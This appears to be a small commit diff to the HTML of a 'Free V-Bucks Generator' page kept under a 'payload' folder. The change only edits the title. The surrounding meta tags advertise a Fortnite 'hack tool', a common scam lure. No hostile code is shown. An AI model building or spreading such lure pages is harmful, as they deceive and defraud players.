Minified js and css:

--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -10,7 +10,7 @@
          
          gtag('config', 'UA-75326826-2');
       </script>
-      <title>Fortnite Free V-Bucks Generator</title>
+      <title>Free V-Bucks Generator</title>
       <meta charset="utf-8">
       <meta name="description" content="Fortnite Battle Royale Hack Tool Gain Unlimited Free V-Bucks">
       <meta name="keywords" content="Free V-Bucks Generator,Fortnite V-Bucks Free,Fortnite Free V-Bucks Generator,Fortnite hack">
